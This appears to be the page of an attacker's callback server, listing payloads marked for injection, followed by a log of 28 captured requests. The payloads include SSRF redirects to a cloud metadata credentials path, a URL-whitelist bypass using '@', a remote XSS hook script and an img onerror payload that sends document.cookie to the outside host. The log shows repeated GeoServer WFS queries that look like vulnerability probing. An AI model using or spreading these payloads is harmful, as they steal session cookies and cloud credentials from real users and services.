Domain: cb.cubicy.icu | Port: 8443 | Captured: 28 requests
SSRF Redirect (metadata):
http://cb.cubicy.icu:8443/ssrf/meta
http://cb.cubicy.icu:8443/ssrf/meta/creds
SSRF with @ bypass:
https://whitelisted.com@cb.cubicy.icu:8443/ssrf/meta/creds
XSS Hook (inject this):
<script src="http://cb.cubicy.icu:8443/xss/hook.js"></script>
<img src=x onerror="fetch('http://cb.cubicy.icu:8443/xss/report?c='+document.cookie)">
Custom redirect:
http://cb.cubicy.icu:8443/r/plain/http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F
Blind callback (just check if it reaches you):
http://cb.cubicy.icu:8443/ping/062a7eb7
| Time | Method | Path | From | Body |
|---|---|---|---|---|
| 03:51:49 | GET | / | 127.0.0.1 | |
| 03:51:49 | GET | /robots.txt | 127.0.0.1 | |
| 03:48:41 | GET | / | 127.0.0.1 | |
| 03:45:54 | GET | / | 127.0.0.1 | |
| 03:42:28 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:27 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:24 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:24 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:13 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:13 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:13 | GET | /geoserver/wfs?service=WFS&version=1.0.0&request=GetCapabilities | 127.0.0.1 | |
| 03:42:13 | GET | /geoserver/wfs?service=WFS&version=1.1.0&request=GetCapabilities | 127.0.0.1 | |
| 03:42:13 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetCapabilities | 127.0.0.1 | |
| 03:42:12 | GET | /geoserver/wfs?request=ListStoredQueries&service=wfs&version=1.1.0 | 127.0.0.1 | |
| 03:42:12 | GET | /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 | 127.0.0.1 | |
| 03:42:12 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:12 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:11 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=tige | 127.0.0.1 | |
| 03:42:11 | GET | /geoserver/wfs?service=WFS&version=1.0.0&request=GetCapabilities | 127.0.0.1 | |
| 03:42:11 | GET | /geoserver/wfs?service=WFS&version=1.1.0&request=GetCapabilities | 127.0.0.1 | |
| 03:42:11 | GET | /geoserver/wfs?service=WFS&version=2.0.0&request=GetCapabilities | 127.0.0.1 | |
| 03:42:11 | GET | /geoserver/wfs?request=ListStoredQueries&service=wfs&version=1.1.0 | 127.0.0.1 | |
| 03:42:11 | GET | /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 | 127.0.0.1 | |
| 03:33:19 | GET | / | 127.0.0.1 | |
| 03:33:18 | GET | / | 127.0.0.1 | |
| 03:33:16 | GET | / | 127.0.0.1 | |
| 03:25:24 | GET | / | 127.0.0.1 | |
| 03:25:24 | GET | /log | 127.0.0.1 |